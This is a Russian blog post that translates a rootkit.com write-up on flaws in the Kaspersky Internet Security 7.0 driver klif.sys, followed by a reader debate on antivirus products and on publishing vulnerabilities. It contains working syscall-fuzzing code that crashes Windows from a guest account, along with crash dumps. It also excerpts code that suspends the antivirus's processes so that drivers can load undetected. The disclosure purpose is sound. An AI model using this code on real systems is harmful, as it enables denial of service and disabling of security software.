Черные ходы Касперского 6/7

    Перевод статьи с сайта rootkit.com

    Преамбула

    Антивирус Касперского — один из наиболее технически развитых антивирусов на сегодняшний день. Он даже может бороться с некоторыми типами руткитов, даже когда они живы и пытаются атаковать.

    Он имеет Модуль Проактивной Защиты (Proactive Defence), представляющий из себя частичную реализацию HIPS, способную, в теории, защитить компьютер от неизвестных угроз, анализируя поведение программ и предотвращая несанкционированные действия.

    Это всё теория и рекламные слоганы. В реальности же мы имеем совсем другую ситуацию. Существует много руткитов, которые вообще не обнаруживаются антивирусом, а его проактивная защита может быть подавлена таким образом, что атакующий может загрузить свой драйвер, после чего любая проактивная защита просто бесполезна.

    Эта статья — не просто обзор ошибок и уязвимостей — в конце каждой части мы даём рекомендации разработчикам антивируса, потому что мы видим, что они не могут разобраться с этими ошибками самостоятельно. И для приверженцев сразу оговорка: конечно, все, что написано ниже — не критические уязвимости, нет-нет =) Всего лишь несколько простых методов получить BSOD при установленном KAV/KIS даже из под гостевого аккаунта, всего лишь методы обхода KAV/KIS… и так далее, в общем не принимайте слишком близко к сердцу.

    Версия Касперского, про который пойдёт речь в этой статье — 7.0, последний публичный билд 125, тип продукта — Internet Security.

    Касперский и System Service Descriptor Table

    Эта часть антивируса давно известна, как самая уязвимая. Таковой она является из-за того, что содержит множество элементарных ошибок. Ошибки эти — ещё один пример плохо написанной проактивной защиты.

    Под Windows XP Антивирус Касперского добавляет службы в таблицу SSDT. Множество служб, которые существуют лишь под Windows 2003. Их номера — от 284 до 296. Около 13 неизвестных записей с адресами внутри klif.sys.

    Вот они:
    ntkrnlpa.exe-->UNKNOWN_SSDT_ENTRY, 0xF809BD80 hook handler located in [C:\WINDOWS\system32\drivers\klif.sys]
    ntkrnlpa.exe-->UNKNOWN_SSDT_ENTRY, 0xF809BD90 hook handler located in [C:\WINDOWS\system32\drivers\klif.sys]
    ntkrnlpa.exe-->UNKNOWN_SSDT_ENTRY, 0xF809BDA0 hook handler located in [C:\WINDOWS\system32\drivers\klif.sys]
    ntkrnlpa.exe-->UNKNOWN_SSDT_ENTRY, 0xF809BDC0 hook handler located in [C:\WINDOWS\system32\drivers\klif.sys]
    ntkrnlpa.exe-->UNKNOWN_SSDT_ENTRY, 0xF809BDE0 hook handler located in [C:\WINDOWS\system32\drivers\klif.sys]
    ntkrnlpa.exe-->UNKNOWN_SSDT_ENTRY, 0xF809BE10 hook handler located in [C:\WINDOWS\system32\drivers\klif.sys]
    ntkrnlpa.exe-->UNKNOWN_SSDT_ENTRY, 0xF809BE20 hook handler located in [C:\WINDOWS\system32\drivers\klif.sys]
    ntkrnlpa.exe-->UNKNOWN_SSDT_ENTRY, 0xF809BE40 hook handler located in [C:\WINDOWS\system32\drivers\klif.sys]
    ntkrnlpa.exe-->UNKNOWN_SSDT_ENTRY, 0xF809BE50 hook handler located in [C:\WINDOWS\system32\drivers\klif.sys]
    ntkrnlpa.exe-->UNKNOWN_SSDT_ENTRY, 0xF809BF10 hook handler located in [C:\WINDOWS\system32\drivers\klif.sys]
    ntkrnlpa.exe-->UNKNOWN_SSDT_ENTRY, 0xF809BFE0 hook handler located in [C:\WINDOWS\system32\drivers\klif.sys]
    ntkrnlpa.exe-->UNKNOWN_SSDT_ENTRY, 0xF809C020 hook handler located in [C:\WINDOWS\system32\drivers\klif.sys]
    ntkrnlpa.exe-->UNKNOWN_SSDT_ENTRY, 0xF809C060 hook handler located in [C:\WINDOWS\system32\drivers\klif.sys]


    Что это? Совершенно непонятно. Однако похоже, что разработчики KAV добавляют их, чтобы решить проблему с разным количеством записей в таблице SSDT под Windows XP и 2003. Почему это было сделано именно так — вопрос третий.

    А теперь внимание: любая из этих записей может быть взломана с последующим крахом системы в BSOD даже из под гостевой учётной записи с минимальными привилегиями. Мы написали маленькую программу. Она генерирует некорректные системные вызовы с некорректными параметрами для этих таинственных записей в SSDT. Код очень простой, но эффективный. Выполнение его на чистой Windows не приведёт ни к чем, потому что сама Windows обрабатывает такие ситуации верно.

    var
      Services: array[0..12] of ULONG;
      ThreadTerminated: boolean = false;
      ExecThread: THANDLE;

    function MakeSysCall(SysCallNumber: integer; const Stack: PDWORD): DWORD; stdcall;
    asm
      mov eax, SysCallNumber
      mov edx, Stack
      int 2eh
      mov Result,eax
    end;

    function exec(p1: pointer): DWORD; stdcall;
    var
      i: integer;
      p2: DWORD;
      p3: DWORD;
    begin
      randomize();
      u := 0;
      for i := 0 to 12 do Services[i] := 284 + i;
      while not ThreadTerminated do
      begin
        p2 := random($FFFFFFFF);
        p3 := Services[random(12)];
        MakeSysCall(p3, @p2);
        Sleep(100);
      end;
      CloseHandle(ExecThread);
      ExecThread := 0;
      result := 0;
    end;

    var
      p2: DWORD;
    begin
      ThreadTerminated := false;
      ExecThread := CreateThread(nil, 0, @exec, nil, 0, p2);
    end;


    Результат выполнения: Kaspersky Internet Security v7.0 125 build

    PAGE_FAULT_IN_NONPAGED_AREA (50)
    Invalid system memory was referenced. This cannot be protected by try-except,
    it must be protected by a Probe. Typically the address is just plain bad or it
    is pointing at freed memory.
    Arguments:
    Arg1: e0ae15f9, memory referenced.
    Arg2: 00000000, value 0 = read operation, 1 = write operation.
    Arg3: f8087e8c, If non-zero, the instruction address which referenced the bad memory
    address.
    Arg4: 00000000, (reserved)

    весь текст bsod...

    Но и это еще не всё!
    Не смотря на сообщения о существующих уязвимостях в SSDT разработчики Касперского до сих пор не исправили их!
    Мы можем доказать это простой программой под названием NTCALL. После старта она начинает генерировать некорректные системные вызовы.

    NtCreateSection — вызов этой функции с неверными параметрами приведет к BSOD в klif.sys.
    Вот он наш BSOD:

    KERNEL_MODE_EXCEPTION_NOT_HANDLED_M (1000008e)
    This is a very common bugcheck. Usually the exception address pinpoints
    the driver/function that caused the problem. Always note this address
    as well as the link date of the driver/image that contains this address.
    Some common problems are exception code 0x80000003. This means a hard
    coded breakpoint or assertion was hit, but this system was booted
    /NODEBUG. This is not supposed to happen as developers should never have
    hardcoded breakpoints in retail code, but…
    If this happens, make sure a debugger gets connected, and the
    system is booted /DEBUG. This will let us see why this breakpoint is
    happening.
    Arguments:
    Arg1: c0000005, The exception code that was not handled
    Arg2: 805883ea, The address that the exception occurred at
    Arg3: f669a95c, Trap Frame
    Arg4: 00000000

    Debugging Details:
    — ANALYSIS: Kernel with unknown size. Will force reload symbols with known size.
    ANALYSIS: Force reload command: .reload /f ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004
    ***** Kernel symbols are WRONG. Please fix symbols to do analysis.

    MODULE_NAME: klif

    весь текст bsod...


    Что тут можно сказать?.. Пора прекращать извращаться с SSDT и писать нормальные обработчики для записей SSDT. Возьмите лучше и спросите Олега Зайцева, как правильно устанавливать хуки в SSDT ;)

    Касперский и Теневая SSDT (Shadow SSDT)

    Теневая SSDT — это специальная таблица в win32k.sys, которая содержит адреса системных функций, связанных с отображением пользовательского графического интерфейса (GDI). Касперский устанавливает здесь хуки на некоторые службы чтобы предотвратить работу клавиатурных шпионов и для самозащиты.

    И опять же хуки установлены плохо.

    NtUserSendInput с неверными параметрами и… -> хаха, новый BSOD, вам это не напоминает какой-то BSOD- генератор? =)

    PAGE_FAULT_IN_NONPAGED_AREA (50)
    Invalid system memory was referenced. This cannot be protected by try-except,
    it must be protected by a Probe. Typically the address is just plain bad or it
    is pointing at freed memory.
    Arguments:
    Arg1: e1f83004, memory referenced.
    Arg2: 00000000, value 0 = read operation, 1 = write operation.
    Arg3: f9417eee, If non-zero, the instruction address which referenced the bad memory
    address.
    Arg4: 00000001, (reserved)

    Debugging Details:
    — ANALYSIS: Kernel with unknown size. Will force reload symbols with known size.
    ANALYSIS: Force reload command: .reload /f ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004
    ***** Kernel symbols are WRONG. Please fix symbols to do analysis.

    MODULE_NAME: klif
    весь текст bsod...

    Для этой части рекомендации просты — запустите свой драйвер под отладчиком.

    Следующий код

    var
      p1: PChar;
    begin
      p1 := PChar($ffffffff);
      LoadLibraryA(p1);
    end;


    ведёт к Acces Violation и это нормально, потому что мы использовали некорректный параметр для функции, но то что НЕнормально — это где возникает Acess Violation, по адресу — 0xF80B3306.
    Это не шутка — 0xF80B3306. В процессах ядра! А если быть точнее — в klif.sys.

    Давайте посмотрим, что происходит.

    Мы обнаружили сильную модификацию IAT(1, 2) для каждого процесса в системе. Смотрите что происходит с explorer.exe

    [420]explorer.exe-->kernel32.dll-->LoadLibraryExA, Type: IAT Modification at address 0x010010A8-->7C882FB0 hook handler located in [kernel32.dll]
    [420]explorer.exe-->kernel32.dll-->LoadLibraryExW, Type: IAT Modification at address 0x010010F8-->7C882FD8 hook handler located in [kernel32.dll]
    [420]explorer.exe-->kernel32.dll-->LoadLibraryA, Type: IAT Modification at address 0x01001150-->7C882F9C hook handler located in [kernel32.dll]
    [420]explorer.exe-->kernel32.dll-->LoadLibraryW, Type: IAT Modification at address 0x010011D0-->7C882FC4 hook handler located in [kernel32.dll]
    [420]explorer.exe-->kernel32.dll-->GetProcAddress, Type: IAT Modification at address 0x010011E4-->7C882FEC hook handler located in [kernel32.dll]


    Странно, не так ли? Давайте отследим вызов LoadLibraryA.

    KERNEL32.LoadLibraryA:

    push ebp
    mov ebp, esp
    nop
    pop ebp
    jmp +$7b830b4a //- перенаправление в klif.sys
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    nop
    nop


    Вот так выглядит LoadLibraryA внутри kernel32.dll после перенаправления IAT Антивирусом Касперского. Разве это не извращение?

    Если вы инсталлируете этот антивирус себе на компьютер, вы (какая ирония!) открываете его для дополнительных уязвимостей и бэкдоров, созданных благодаря Антивирусу Касперского! Смех, да и только.

    В этой части мы рекомендуем разработчикам Касперского убрать извращения из своего продукта. Во первых существуют лучшие и более простые способы общаться с процессами ядра, а во-вторых — это просто извращение.

    Антивирус Касперского и самозащита

    Как большинство из вас знает, Антивирус Касперского активно защищает самого себя против атак. Его процессы защищены от несанкционированного доступа и от уничтожения зловредными программами. Но вопрос: насколько хорошо они защищены?

    Ответ: ПЛОХО.

    Касперский устанавливает несколько хуков в SSDT (т.е. NtOpenProcess, NtOpenThread, NtTerminateProcess и т.д) и несколько хуков в Теневой SSDT (NtUserFindWindowEx, NtUserBuildHwndList и т.д.) чтобы дополнительно защитить себя от атак.

    В конце концов он устанавливает себя как службу с настройками перезапуска при возникновении ошибки. Настройки службы защищены в реестре несколькими хуками в SSDT. Так как же мы можем убить этот антивирус? И нужно ли нам его убивать? Если мы убьём визуальную часть avp.exe то она будет заново запущена службой. Если мы убьём службу — она будет запущена менеджером контроля служб (SCM). Так как же мы можем уничтожить этот антивирус (в образовательных целях, конечно)? Вопрос хороший.

    Ответ прост — загрузить драйвер, после этого мы будем вне зоны интересов KAV. Но сначала нам нужно его приостановить, чтобы получить такую возможность, не правда ли? Не совсем. Существует как минимум три метода, с помощью которых можно тихо загрузить драйвер без малейшей реакции со стороны Проактивной Защиты Касперского 7.0. И я уверен что существуют еще методы. В нашем случае мы просто приостановим (suspend) все потоки (threads) процессов Антивируса Касперского; просто приостановим, ничего более — этого достаточно.

    Мы не можем обращаться к процессам Касперского напрямую, потому что владельцем SSDT является PDM. Так что самое время использовать «любимый» бэкдор-процесс по имени csrss.exe :)

    В этом примере мы априори предполагаем что KAV приложение названо avp.exe и csrss.exe существует в одном экземпляре (LOL, да, если у вас есть вредоносные программы, работающие на ring3 и маскирующиеся как csrss.exe, то с этим кодом будут определённые проблемы).


    pBuffer.dwSize := sizeof(PROCESSENTRY32W);
    SnapShotHandle := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0);

    if (ZwOpenProcess(@ph, PROCESS_ALL_ACCESS, @attr, @cid1) <> STATUS_SUCCESS) then exit;

    ZwAllocateVirtualMemory(GetCurrentProcess(), buf, 0, @bytesIO, MEM_COMMIT, PAGE_READWRITE);
    ZwQuerySystemInformation(SystemHandleInformation, buf, 4194304, @bytesIO);
    весь текст программы...


    После этого оба испольняемых модуля Касперского будут приостановлены и мы можем загрузить драйвера и сделать свою работу тихо =)

    Протестировано на KIS v7.0 build 125 с настройками по умолчанию.
    Windws XP SP2, права администратора.

    Мы рекомендуем ЛК пройти в HANDLE_TABLE и изменить права доступа для хендлеров своих процессов. Плюс самое время улучшить хук на NtDuplicateObject.

    Эпилог

    Вы наверное сейчас спрашиваете себя, почему такие очевидные ошибки — действительно чёрные ходы до сих пор существуют в одном из самых популярных антивирусов? Да потому что кто-то должен хорошенько дать под зад Лаборатории Касперского.

    Не так давно мы опубликовали другой обзор ошибок KAV. Реакция была ожидаема. Они сказали что-то наподобие «Не волнуйтесь, это не критические ошибки». Ну да, возможно Синий экран смерти из под Гостевой учётной записи это не такая уж большая проблема для компании. «Действительно. Че за BSOD вообще? Фигня, расслабьтесь ребята» :) Но что-то меняется — они закрыли несколько опубликованных уязвимостей, так что должны были бы сказать небольшое спасибо нам. Вместо этого мы получаем кучу $@%$&#! в свой адрес (неофициально, конечно). Что ж, мы просто не переживаем по поводу такой реакции, так что не утруждайте себя ребята(фанатики?). Мы не хотим саморекламы и не хотим наблюдать тупейшие BSOD-ы от Касперского.

    Дорогие разработчики Лаборатории Касперского, ваш антивирус весьма хорош, об этом спору нет, но возможно пришло время поправить эти баги? Убрать извращения с SSDT/IAT. Тщательнее обработывать критические ситуации в своём драйвере. Нет серьёзно, а что не так? Смотря на klif.sys я вижу только одно — большой, глючный драйвер.

    Кстати, в некотором роде неофициальную реакцию от Лаборатории Касперского на наш предыдущий обзор klif.sys вы можете прочитать в этой чудесной статье, которая содержит несколько абсурдных утверждений и не несущих смысла комментариев. В нескольких словах: автор этой статьи частично обвинил нас в публикации информации про уязвимости в их старых и новых продуктах.

    www.viruslist.ru/analysis?pubid=204007553

    Статья на русском, но я уверен вы сможете найти английский вариант.

    Have fun,
    от VX heavens
    EP_X0FF/UG North

    rootkit.com


    smartov: Цитата из статьи, про которую они говорят в конце
    В последние годы чрезвычайно актуальна следующая ситуация. Некто из среды киберпреступников (или «исследователей», прикрывающихся белыми шляпами) разрабатывает концепт кода, обходящего современные средства защиты, и в целях самопиара, замаскированного под заботу о прогрессе, публикует его как «недетектируемый». Подчеркнем: разумеется, на деле такой концепт является не принципиально недетектируемым, а недетектируемым на уровне одно-двухшагового обхода известных функций средств защиты. Сделать такой одношаговый обход достаточно просто, если известны механизмы защиты.

    Подобные публикации заставляют беспокоиться определенный процент пользователей, не знакомых с принципами работы вредоносных программ и антивирусов («А защищает ли мое антивирусное средство от этого нового типа угроз?). В такой ситуации производителям средств защиты остается только бросить долю ресурсов на восстановление своего авторитета: на разработку технологий обхода описанного концепта, обычно таких же, как и сам концепт — одношаговых. В итоге авторитет восстанавливается (а как же иначе?), система «вредоносная программа — антивирус — пользователь» приходит в изначальное состояние, и процесс замыкается в цикл. Каждая новая его итерация порождает все более изощренные вредоносные программы и все более тяжеловесные средства защиты.


    Как было в КВН: «Отличный план!». Такие себе бяки публикуют уязвимости, а из-за этого бедным-несчастным производителям антивирусов приходится оторваться от стрижки капусты разработки нового улучшенного пользовательского интерфейса и заняться их устранением.

    p.s. У самого установлен KAV 7.0.0.125…
    Поделиться публикацией
    AdBlock похитил этот баннер, но баннеры не зубы — отрастут

    Подробнее
    Реклама

    Комментарии 117

      +6
      А что, кто-то ещё пользуется Касперским?
        +2
        те кто не пользуются линксом и маком =)
          0
          Ну, положим под Linux он есть. Нужен или нет - другой вопрос.
            0
            я так понимаю он там для фильтрации трафика. или нет?
              0
              Для фильтрации. Есть в принципе real-time monitor для контроля файлопомоек.
            0
            "-- Набил бы я тебе рыло, — мечтательно сообщил Остап,
            — только Заратустра не позволяет*. Ну, пошел к чертовой
            матери, продвинутый ты наш!.."
              0
              к чему цитата? вы предлагаете слать к чертовой матере прогресс? =)
                –1
                нет. но гляньте на комментарий kronos чуть ниже и, я надеюсь, поймете.
            –7
            Кто-то еще пользуется виндой? :)
              0
              Для желающих, Каспер есть и под Линукс %)
                0
                Он там для того чтобы не пропускать вирусы на соседний Виндоус, почитайте о нём на сайте Касперского.
                  0
                  П.С.: А за статью большое спасибо.
                –2
                Один толковый комментарий, и тому 6 минусов, может что-то не так в этом мире? Гугл - зло,...
                  +1
                  Даже смайлик добавил :) все равно юмора народ не понял)
                    –1
                    о, и мне минус ) давай кому больше))))). ВИНДА - ГОВНО )))))))
                      –1
                      Ну и что вы хотите этим доказать?
                        –1
                        Он хочет сказать то, что на хабре ставить минус стало "модно". Это такой способ самовыражения.
                        Сидит такая себе коза ностра и всех несогласных - в утиль
                          0
                          спасибо, все верно, мне нечего добавить.
                          • НЛО прилетело и опубликовало эту надпись здесь
                      0
                      +1
                  • НЛО прилетело и опубликовало эту надпись здесь
                    +1
                    Ассемблер - сила :)
                      –9
                      Уж лучше NOD 32 или AVAST, ну или на крайняк Dr.Web юзать.
                        0
                        Аргументируйте свой ответ, пожалуйста (если вы действительно в этом разбираетесь).
                          +5
                          Думаю эта фраза не более чем очередной штамп.
                          Есть Штамп №1 - Касперский - лучший антивирус
                          Есть Штамп №2 - НОД лучше чем касперский
                          Есть Штамп №3 - Все что угодно лучше чем Касперский.

                          Все эти штампы неверны :) Но с неисстребимым постоянством появляются в рунете там и тут.
                          0
                          Из всего набора KIS я использую использую "Веб-антивирус" и "Сетевой экран". И как фаирвол KIS меня во всем устраивает.
                            +2
                            Пользовался Касперским не понравилось, пользовался так же AVAST грузит, а NOD меня просто устраивает. ИМХО.
                              +2
                              >>Пользовался Касперским не понравилось

                              Иконки некрасивые?
                            0
                            AVAST, тем более home версия какашка, половину вирей пропускает. По сравнению с Avast KAV лучше в разы
                              0
                              NOD32 у меня лично пропустил троян, который KAVом ловится. После чего естественно был безжалостно выкинут.
                                +1
                                Я вот честно не понимаю вот таких утверждений: "НОД пропустил трой в КАВ его поймал... теперь я юзаю только его так он самый крутой и надежный".

                                Так могут говорить только люди которые не имеют ни малейшего понятия о том как детектируются вирусы и как добавляются в базу. Просто в этот раз повезло касперскому, он раньше выловил вирус в "дикой природе" и добавил его сигнатуру быстрей чем НОД. Никто не гарантирует того что завтра будет также.

                                Скажу более, что для того чтобы выпустить новую версию вируса или троя которой не будет детектироваться, достаточно найти изменить всего один байт в теле вируса... и все... Хваленные КАВы, НОДы и прочие отдыхают. Даже эвристика легко обходится за пару часов.

                                Вывод следующий: надо выбирать антивирус которой как можно шире раскинул свой "щупальцы" по интернету.
                                  0
                                  Я не говорю, что KAV самый крутой и надежный. Но у меня лично к нему доверия больше.

                                  И не надо судить о чем кто-то имеет понятие, а о чем не имеет - можно сесть в лужу.
                                    0
                                    Извиняюсь если обидел, я не вас конкретно имел в виду, просто на вашем комментарии появилось сильное желание высказать свое мнение :)

                                    > Но у меня лично к нему доверия больше.
                                    Вот это как раз и есть главное. Большинство людей держат антивирус для галочки. Т.е. им так комфортней, когда они знают что у них есть защитное ПО. Чисто психологический защитный барьер. Все знают что нет идеального антивируса, все знают что если захотеть то можно его обойти, но все держат у себя на машине антивирусы... И я тоже :) Это как дверной замок - хорошего взломщика не остановит, но с ним как-то надежней себя чувствуешь...
                                      0
                                      Доверие основано на том, что он еще ни одного вируса не пропустил у меня. А не на психологии.
                                        –1
                                        Гм, а вы уверены? Извините, но такие заявления улыбают. сейчас диструктивные вирусы выходят из моды, вы уверены что на вашем компе не стоит бекдор и не поднят спамерский SMTP сервер? может я и параноик, но с виндой я в этом не уверен (на своем компе), по-этому под виндой не пользуюсь никакими средствами хранящими личные данные(не смотрю почту, не пользуюсь интернет деньгами, не лажу по ftp/sftp).
                                          0
                                          Да, я уверен. Моей квалификации более чем достаточно, чтоб заметить "левую" активность на моем компьютере.
                                  0
                                  Имя трояна?
                                    0
                                    Не помню, дело было 2-3 месяца назад.
                                      0
                                      Почему-то всегда при посте "Этот антивирус обнаружил, а тот нет" конкретное название вируса никто сказать не может )))
                                        0
                                        А зачем мне их записывать?
                                          0
                                          На работе завелась неприятная тварь по имени Email-worm.Win32.Brontock.a, нодом ничего не обнаруживалось. И при этом долгое время (месяца 2 точно, как щас не знаю) после того как я прогнал его каспером, Почти у всех друзей "нодовцев" он всплывал, т.е. я узнавал его по симптомам, и рекомендовал провериться каспером хотя бы с загрузочного диска.
                                  +1
                                  Думаю, юольшинство пользователей Хабра понимают, что АVP — раскрученный бренд, не более того и продукты продвигаются за счет грамотного маркетинга и удобного интерфейса. Аниспам хорошо работал в KIS, но после серъезного заражения снес и никогда больше не поставлю. Нет доверия. Пользуюь NOD32.
                                  • НЛО прилетело и опубликовало эту надпись здесь
                                      –2
                                      Я вот что скажу: при правильной работе с компьютром риск заразиться "залетным вирусом" или трояном или червем (тобишь не таким, который специально нацелен именно на ваш компьютер именно на вашу систему и именно с конкретной целью) очень мал (прошу заметить, именно мал, а не нулевой). Правильная работа - это значит:
                                      1. не лазить по варезным и другим подозрительным сайтам
                                      2. не открывать подозрительные письма
                                      3. пользоваться лицензионным софтом
                                      К сожалению очень мало людей соблюдают эти правила, в связи с чем и воникает большая опасность заражения вирусами.
                                      И еще один коммент: прочитав то, что здесь написано, я заметил некоторую общую мысль, что мол производители антивирусов либо ничего не делают либо делают это очень медленно. Вообще-то, они тоже люди и у них тоже есть начальство, которое заваливает их важной работой, они не бездельничают просто у них очень много работы, ибо каждый день какой-нибудь школьник выкладывает в сеть очередную "поделку", а им эти "рефераты" надо проверять, да еще необходимо заметить, что в сутках, к сожалению только 24 часа, а людей в любой конторе ограниченное количество.
                                        0
                                        Винград-салют камрад :)
                                        Согласен что если соблюдать все три правила - то риск заражения значительно снижается. Однако если ты просто вышел в сеть из под WinXP без сервис пака т.е. без файерволла, то даже при соблюдении всех этих трех правил, и вообще без открывания единой ссылки комп проживёт минут 20 не более. Потом просто умрёт от уязвимости в RPC, исправленной в SP1.
                                        Но истинно что самая большая угроза безопасности компьютера сидит перед его монитором.
                                          0
                                          Винград-салют :)
                                          Если используешь лицензионную вёнду - то она должна по идее автоматически обновляться, так что это входит в эти три условия.
                                          И вообще, надо использовать правильную ОСь, тогда будет меньше проблем с безопасностью.
                                          >Но истинно что самая большая угроза безопасности компьютера сидит перед его монитором
                                          Абсолютно согласен с этим утверждением.
                                            0
                                            20 минут? Ужас!
                                            Правда, я шастал в интернет и в ХР SP1, и вирусов не было. Видимо, я просто волшебник...
                                              0
                                              Возможно ваш антивирус их просто не находил ;)
                                                0
                                                Очень тяжело найти чёрную кошку в тёмной комнате, особенно, если её там нет.
                                                0
                                                В своё время (года 3 назад) у меня небыло и 3-х минут чтобы успеть установить заплатку перед тем как винда рухнет от RPC... Потом я догадался отключать комп от сети )
                                              0
                                              "3. пользоваться лицензионным софтом" - где то я это уже слышал)))
                                              а в остальном согласен.
                                                0
                                                Один раз заразился следующим образом:
                                                Пришло сообщение от друга URL на какую-то картинку. Он не специально, уже подхватил червя. Я кликнул. Канал был медленный и поэтому переключился в TC, чтобы продолжить заниматься своими делами пока она грузится. При каком то привычном действии TC запросил подтверждение и я автоматом нажал согласиться. Но к моменту клика картинка загрузилась и оказалась не картинкой а каким то исполняемым файлом и IE выкинул подтверждение. Ну и кликнул я не на TC а на то что предложил IE.
                                                Вот такой вот несчастный случай.
                                                • НЛО прилетело и опубликовало эту надпись здесь
                                                0
                                                А можно поинтересоваться чем именно был заражен компьютер при установленном и включенном KIS'e?
                                                  0
                                                  не вспомню, давно было, больше года назад.
                                                    0
                                                    Вот всегда так :-(
                                                +3
                                                Касперский - самый известный в России антивирус. Поэтому только ленивый не проверит им свой вирус/троян перед тем как выпустить его на волю :D
                                                  –2
                                                  неужели кто-то верит что поиск уязвимостей делает ситуацию лучше?
                                                  • НЛО прилетело и опубликовало эту надпись здесь
                                                      0
                                                      скажи мне как то, что они находят и постят уязвимости, улучшает защищенность чего-либо? по-умолчанию, каждую прогу можно взломать, уязвимость заделал, уязвимость появилась, что дальше? Вообще какая мотивация в поиске уязвимостей кроме как почувствовать себя кулхацкером? Он нашел уязвимость, сделал мир безопаснее, супер логика, двачую.
                                                      • НЛО прилетело и опубликовало эту надпись здесь
                                                          0
                                                          На самом деле, хорошие люди сначала обращаются к разработчику, а уже потом постят их по интеренету. Тут видно человек немного обижен на то, что за нахождение некритической уязвимости ему не послали почтой медаль и грамоту не вручили.
                                                          • НЛО прилетело и опубликовало эту надпись здесь
                                                        0
                                                        Скорее всего уже нашли и используют. Это трудоемкий процесс и думаю тех кто находит уязвимости для их использования значительно больше, чем тех, кто их просто будет публиковать.
                                                      0
                                                      Комментарий разработчиков не лишен смысла.
                                                      Ведь производители антивирусов не могут создать 100%-но защищенную систему в незащищенной операционной системе. Т.е. обход защиты действительно всегда есть.

                                                      Вирусописание - лишь на доли процента профессиональная вредоносная и преступная деятельность - в остальном, в большинстве случаев, это побочный продукт самоутверждения школьников и студентов, увлеченных изучением системы на низком уровне. И вы даете им информацию, которую они так настойчиво гуглят.
                                                        0
                                                        Се ля ви... Палка она всегда о двух концах.
                                                        А что вы предлагаете? Зарыть голову в песок и настойчиво повторять "Ошибки в Касперском - не критические" ?

                                                        Так только MS поступает. Пока про уязвимость знает меньше 10 человек - уязвимости нет. Меньше 1000 - она не критическая и т.п. до тех пор пока не закроют всего-лишь годика через пол, как было с одной уязвимостью в IE. О которой заявили зимой, а закрыли её только осенью, медленно повышая статус вплоть до критической.

                                                        Если статьи, подобные этой, сподвигнут ЛК править свой продукт - то пусть такие статьи будут. А если не сподвигнут - значит Касперскому пора об этом написать большими буквами на своем сайте, и отодвинуться, дав дорогу другим разработчикам, которые захотят закрывать свои дыры.
                                                          +1
                                                          Так поступает не только MS. Это логично для софтверной компании, работающей на прибыль, а не на обороноспособность страны, например. Это коммерческий антивирус и радуйтесь что он хорош. И не раздевайте его перед школьниками, давая готовые исходники эксплоитов!

                                                          Прочитайте, например, статьи про переход на нулевое кольцо на wasm.ru - примеры построены академически и над ними еще надо очень попотеть чтобы заставить выполнить практическую функцию для своего суперпупер трояна и т.д.
                                                          Хотя бы так. В противном случае от вашей статьи намного больше вреда чем пользы!
                                                            0
                                                            Неужели вы попробовали откомпилировать те исходники которые не_я и у вас таки получилось с первого раза?
                                                            Или неужели вы думаете, что пока студия не почувствует что вот завтра их антивирус натянет любой школьник, выражаясь вашим языком, она почешется?
                                                            Да у ней те же интересы, что и у микрософт: мало ли кто там написал что можно взломать. Он же не написал как. Так что можно не торопиться и ещё годика пол подождать.

                                                            Так же мне не совсем ясна ваша позиция про "радуйтесь что он хорош". Вы мне предлагаете "хавать что дают"? Простите, но я публикую подобные статьи как раз для того, чтобы был какой-то прогресс. А радоваться тому, что есть, я и так не перестаю, поверьте. Ведь в любом случае наличие AVP это гораздо лучше отсутствия антивируса как такового.
                                                          0
                                                          "Ведь производители антивирусов не могут создать 100%-но защищенную систему в незащищенной операционной системе."
                                                          Дело не в этом. Защита должна быть адекватна ценности защищаемой информации. Никто и не стремится создавать идеалов.
                                                          Но тут иной случай. Каспер - популярнейший в России антивирус. Разработчики жалуются что такими статьями им мешают жить. А в статье-то описан ляп, который вызывает bsod даже с правами гостя. Опустите технические подробности, и вы получите полное несоответствие продукта ожиданиям пользователя (он тупо может мешать работать, а то и серьзно подорвать безопасность системы).

                                                          "И вы даете им информацию, которую они так настойчиво гуглят."
                                                          Что плохого в распространении такого рода информации? Она секретная?
                                                            0
                                                            безопасности проделали?! да нет же. они просто протупили и заставили меня откатить дрова.

                                                            З.Ы.: коммент забавно порубился...
                                                              0
                                                              ЭТО является продолжением длинного комента который хабр "скурил" :(
                                                              при чем перед отправкой этой части предыдущую я видел. а сейчас ее не видно :(
                                                              переписывать снова мне лень, вкратце звучало примерно так - BSOD это далеко не самое страшное что может происходить и по сути BSOD следует рассматривать как досадное неддоразумение а не как мега-дыро-бекдор-ставащий-ваш-комп-под-смертельную-угрозу ;)
                                                              • НЛО прилетело и опубликовало эту надпись здесь
                                                          • НЛО прилетело и опубликовало эту надпись здесь
                                                          • НЛО прилетело и опубликовало эту надпись здесь
                                                              0
                                                              так по тому что ложили - по тому и не слышите. прислушайтесь, возможно где-то в оперативной памяти они уже шуршат перекладывая биты ваших паролей :)
                                                                0
                                                                Шуршать они могут с любым антивирусом.
                                                                  0
                                                                  но с антивирусом вероятность этого куда меньше
                                                                0
                                                                Хи, а если вы на вирусы положили, зачем вам касперский? :)
                                                                • НЛО прилетело и опубликовало эту надпись здесь
                                                                  +4
                                                                  Ботнеты — полностью самодостаточные социальные сети будущего.
                                                                    0
                                                                    каналов на них не напасёшься :'(
                                                                      0
                                                                      Есть два способа 100% защитить ваш канал от спама с вашего компьютера:
                                                                      1. Выключить электропитание компьютера (полностью)
                                                                      2. Отключить LAN/Phone или иной кабель сетевого подключения
                                                                  –1
                                                                  А написать сначала в ЛК по поводу это религия не позволяет? Алиса совершенно права относительно Вас, в данном опусе больше самопеара, чем всего остального.
                                                                    0
                                                                    Ну во-первых не меня, а автора статьи. А во-вторых, если верить автору - в ЛК написали. Ну а напоследок - как показывает практика разработчики некоторых продуктов действительно очень болезненно относятся к подобной критике продукта, пытаясь её игнорировать до тех пор, пока это можно делать.

                                                                    ЗЫ А вы имеете отношение к ЛК, я верно понимаю? Если да - я очень рад что вы обратили на это внимание. Потому что это вселяет надежду на более быстрое устранение этих недочётов :) Если нет - почему Алису назвали по имени ;)
                                                                      0
                                                                      Да, прошу прощения попутал. Нашел оригинал, http://rootkit.com/newsread.php?newsid=7…. На сколько я помню, исправлено (но врать не буду а проверить точно не могу, я в отпуске. помню, что 2 месяца назад уже видел ее и писал куда следует, а из того, что оно мне не запало в душу делаю вывод, что все уже исправлено).
                                                                        0
